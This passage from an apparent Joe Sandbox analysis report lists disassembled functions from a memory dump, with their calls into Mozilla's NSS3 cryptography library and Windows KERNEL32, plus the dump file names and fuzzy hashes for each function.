PR_SetError.NSS3(FFFFE001,00000000), ref: 6C742E8B

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

Part of subcall function 6C72F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C719BFF,?,00000000,00000000), ref: 6C72F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C717FFA), ref: 6C742EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C74317B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 1f0eabbc64ce28dbb88ccc1b7076de336f80456780f1e47c91930512c84f942e
Instruction ID: 4cc23f43eb3176dcc0fe6d5b1aa99316a5c7f52d9c67b896a2a39914ba413ad8
Opcode Fuzzy Hash: 1f0eabbc64ce28dbb88ccc1b7076de336f80456780f1e47c91930512c84f942e
Instruction Fuzzy Hash: E0A1DF71A002189FDB24CF54CC84BEAB7B5EF49308F0481A9ED49A7741E731AE95CFA1

Function 6C70ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C70ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C70EDCE

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

free.MOZGLUE(00000000,?,?,?,?,6C70B04F), ref: 6C70EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C70EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C70EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C70EEFB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 6e0f860f5b433ae8e268709b4e29cff92b5e0dbdeec129e0e2f60bf464ec3228
Instruction ID: a8f87fd0868b8f3647e94ea2f7bbca36d70a71ab75ba785a48a227337871e654
Opcode Fuzzy Hash: 6e0f860f5b433ae8e268709b4e29cff92b5e0dbdeec129e0e2f60bf464ec3228
Instruction Fuzzy Hash: 19815AB5B002099FEB14CF55DA85AAB77F9FF88308F144438E9A59B751D730E814CBA1

Function 6C70CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C70C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C70DAE2,?), ref: 6C70C6C2

PR_Now.NSS3 ref: 6C70CD35

Part of subcall function 6C769DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DC6
Part of subcall function 6C769DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DD1
Part of subcall function 6C769DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C769DED

Part of subcall function 6C6F6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6A1C6F,00000000,00000004,?,?), ref: 6C6F6C3F

PR_GetCurrentThread.NSS3 ref: 6C70CD54

Part of subcall function 6C769BF0: TlsGetValue.KERNEL32(?,?,?,6C7B0A75), ref: 6C769C07

Part of subcall function 6C6F7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6A1CCC,00000000,00000000,?,?), ref: 6C6F729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C70CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C70CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C70CE2C

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C70CE40

Part of subcall function 6C7014C0: TlsGetValue.KERNEL32 ref: 6C7014E0
Part of subcall function 6C7014C0: EnterCriticalSection.KERNEL32 ref: 6C7014F5
Part of subcall function 6C7014C0: PR_Unlock.NSS3 ref: 6C70150D

Part of subcall function 6C70CEE0: PORT_ArenaMark_Util.NSS3(?,6C70CD93,?), ref: 6C70CEEE
Part of subcall function 6C70CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C70CD93,?), ref: 6C70CEFC
Part of subcall function 6C70CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C70CD93,?), ref: 6C70CF0B
Part of subcall function 6C70CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C70CD93,?), ref: 6C70CF1D

Part of subcall function 6C70CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C70CD93,?), ref: 6C70CF47
Part of subcall function 6C70CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C70CD93,?), ref: 6C70CF67
Part of subcall function 6C70CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C70CD93,?,?,?,?,?,?,?,?,?,?,?,6C70CD93,?), ref: 6C70CF78

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: e714d9bd12aaeeb977f721f26aaeae4bac26bd868f103a0d6cecc872826bd7d1
Instruction ID: ebe5300122e1682a1c235df11b0f8931b7ade009c375d9fb17a88892fb224f38
Opcode Fuzzy Hash: e714d9bd12aaeeb977f721f26aaeae4bac26bd868f103a0d6cecc872826bd7d1
Instruction Fuzzy Hash: 1851C3F6B001049BE710DF69DE44B9A73E8EF48349F250534E95897B40EB31E905CBA2

Function 6C6DEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C6DEF38

Part of subcall function 6C6C9520: PK11_IsLoggedIn.NSS3(00000000,?,6C6F379E,?,00000001,?), ref: 6C6C9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C6DEF53

Part of subcall function 6C6E4C20: TlsGetValue.KERNEL32 ref: 6C6E4C4C
Part of subcall function 6C6E4C20: EnterCriticalSection.KERNEL32(?), ref: 6C6E4C60
Part of subcall function 6C6E4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4CA1
Part of subcall function 6C6E4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C6E4CBE
Part of subcall function 6C6E4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4CD2
Part of subcall function 6C6E4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4D3A

PR_GetCurrentThread.NSS3 ref: 6C6DEF9E

Part of subcall function 6C769BF0: TlsGetValue.KERNEL32(?,?,?,6C7B0A75), ref: 6C769C07

free.MOZGLUE(00000000), ref: 6C6DEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6DF016
free.MOZGLUE(00000000), ref: 6C6DF022

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 76c81856cfffc1f4e17cf408d7e6da04320277623800a523fc9f7d9894a85888
Instruction ID: b6d7380dd6543d0926865aebf5e45685850b8bd8a1c121f0fd6bb08a9b2f9a52
Opcode Fuzzy Hash: 76c81856cfffc1f4e17cf408d7e6da04320277623800a523fc9f7d9894a85888
Instruction Fuzzy Hash: 1A41C371E00209AFDF018FA9DC84BEE7BB9EF49358F054025F914A7350E772D9158BAA

Function 6C6B4860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B4894

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B48CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B48DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C6B48FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6B4912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B494A

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: b314b3585fab0071fc734f3e964775920c871240a7d81cdb0796c783363fe1ee
Instruction ID: 48bb3179bf059995dfcc1b69645ac3c5c228d6469fc1fadb9cbc67cc3efade1d
Opcode Fuzzy Hash: b314b3585fab0071fc734f3e964775920c871240a7d81cdb0796c783363fe1ee
Instruction Fuzzy Hash: 3F41D270A043056BE700DE69D881BBB73E89F85358F04052CEA65A7781F7B0E915CB5A

Function 6C6CCF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C6CCF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C6CD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C6CD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6CD025
PR_NewLock.NSS3 ref: 6C6CD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6CD074

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: f1671eca057653c834406fb544eeb99e2c606b4ad149dc54209969de7c325d32
Instruction ID: ddc0d74bfbaa97648c7ad4fd826f7af28545f42f286d4d46e5dd4e12ef651c18
Opcode Fuzzy Hash: f1671eca057653c834406fb544eeb99e2c606b4ad149dc54209969de7c325d32
Instruction Fuzzy Hash: FE41B0B0B413119FDB10DF29C88479A7BE4EF08358F11816ADC198BB46D774D489CBAA

Function 6C708810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C7086AA), ref: 6C708851

Part of subcall function 6C701340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C69F599,?,00000000), ref: 6C70136A
Part of subcall function 6C701340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C6A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C69F599,?,00000000), ref: 6C70137E
Part of subcall function 6C701340: PL_ArenaGrow.NSS3(?,6C69F599,?,00000000,?,6C6A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C69F599,?), ref: 6C7013CF
Part of subcall function 6C701340: PR_Unlock.NSS3(?,?,6C6A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C69F599,?,00000000), ref: 6C70145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6C7086AA), ref: 6C70886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6C708890
PR_GetCurrentThread.NSS3 ref: 6C70891C
PR_GetCurrentThread.NSS3 ref: 6C708937

Part of subcall function 6C769BF0: TlsGetValue.KERNEL32(?,?,?,6C7B0A75), ref: 6C769C07

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: b446c419a979d2fb39ed1bf1a0d3db03fc40d53c11b15a210988dd49d23bb8a7
Instruction ID: eb68b21c7127d5b4ef9770dd1869697b400115a3445002e73777a02ff29b4798
Opcode Fuzzy Hash: b446c419a979d2fb39ed1bf1a0d3db03fc40d53c11b15a210988dd49d23bb8a7
Instruction Fuzzy Hash: CA41D6F0B116029FE704DF29CA94B51BBE4FF04308F04827AD8188B751EB72E964CB91

Function 6C730960 Relevance: 9.1, APIs: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C802F88,Function_00110660,-00000001,?,?), ref: 6C730983

Part of subcall function 6C624C70: TlsGetValue.KERNEL32(?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624C97
Part of subcall function 6C624C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CB0
Part of subcall function 6C624C70: PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CC9

TlsGetValue.KERNEL32(-00000001,?,?), ref: 6C730997
EnterCriticalSection.KERNEL32(?), ref: 6C7309AB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C730A30
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C730A60
PR_Unlock.NSS3 ref: 6C730A85

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuestrcmp$CallOnce
String ID:
API String ID: 3855614339-0
Opcode ID: 252484656e63ad0e8ca76609f428eaedecd02225ede84a6f417966f6aeb50052
Instruction ID: 38d23e7380a0adc6f7b99d88fc141ed969d9af2aeac4e22fe4b6ed9462a1f622
Opcode Fuzzy Hash: 252484656e63ad0e8ca76609f428eaedecd02225ede84a6f417966f6aeb50052
Instruction Fuzzy Hash: 7C412534A013B59BEB208F29EA44A5677B4FF06758F005A3AEC9C97B42D730E854CBD0

Function 6C718890 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000004,?), ref: 6C7188C0
PK11_HashBuf.NSS3(00000003,?,?,?), ref: 6C7188E0
NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C718915
HASH_ResultLenByOidTag.NSS3(00000000), ref: 6C718928
PK11_HashBuf.NSS3(00000000,?,?,?), ref: 6C718957
PK11_HashBuf.NSS3(00000004,?,?,?), ref: 6C718980

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: HashK11_$AlgorithmPolicy$Result
String ID:
API String ID: 2238172455-0
Opcode ID: 5eb21dd343dde24eed28fe2b607b66a0107bc68ce50cf7c86321e6bb87e75571
Instruction ID: c6aa07f3940f0a8390ccfd4340f60d3a3ee8ddbfd3c7fb4ca881d7fac4aedcf1
Opcode Fuzzy Hash: 5eb21dd343dde24eed28fe2b607b66a0107bc68ce50cf7c86321e6bb87e75571
Instruction Fuzzy Hash: 5231FC72D08115ABEB008E65DE44BAB7B98DF05328F190136EE1497E81F7359A1487E7

Function 6C6B2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C6A2D1A), ref: 6C6B2E7E

Part of subcall function 6C7007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6A8298,?,?,?,6C69FCE5,?), ref: 6C7007BF
Part of subcall function 6C7007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7007E6
Part of subcall function 6C7007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C70081B
Part of subcall function 6C7007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C700825

PR_Now.NSS3 ref: 6C6B2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C6B2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C6A2D1A), ref: 6C6B2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C6A2D1A), ref: 6C6B2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C6B2F81

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 12da869641a7ff4638b8a91a61a24bfa09c189fb9a1fc22307011afee2335a73
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 2131F57154110087E710C655CC4CBAF73EDEF81318F644A79D529A7AD0EB319867C72A

Function 6C6A0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C6A0A2C), ref: 6C6A0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C6A0A2C), ref: 6C6A0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C6A0A2C), ref: 6C6A0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C6A0A2C), ref: 6C6A0E90
free.MOZGLUE(00000000), ref: 6C6A0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C6A0A2C), ref: 6C6A0ED9

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: aa1c7a6ad03f51bac5397188c5cb3c6991010fc2b60813146cbd259a94674114
Instruction ID: dbfca7025d0cdc67fced036d718bc4e6376a2b9d274fdef7fa664ca73fbdb330
Opcode Fuzzy Hash: aa1c7a6ad03f51bac5397188c5cb3c6991010fc2b60813146cbd259a94674114
Instruction Fuzzy Hash: 00216172F002845BEB1049E55C45BA772EEFFC1748F050035D81A53B01EA61DC1792A9

Function 6C6B88D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6C0725,00000000,00000058), ref: 6C6B8906
EnterCriticalSection.KERNEL32(?), ref: 6C6B891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C6B894A
calloc.MOZGLUE(00000001,6C6C072D,00000000,00000000,00000000,?,6C6C0725,00000000,00000058), ref: 6C6B8959
memset.VCRUNTIME140(?,00000000,?), ref: 6C6B8993
PR_Unlock.NSS3(?), ref: 6C6B89AF

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
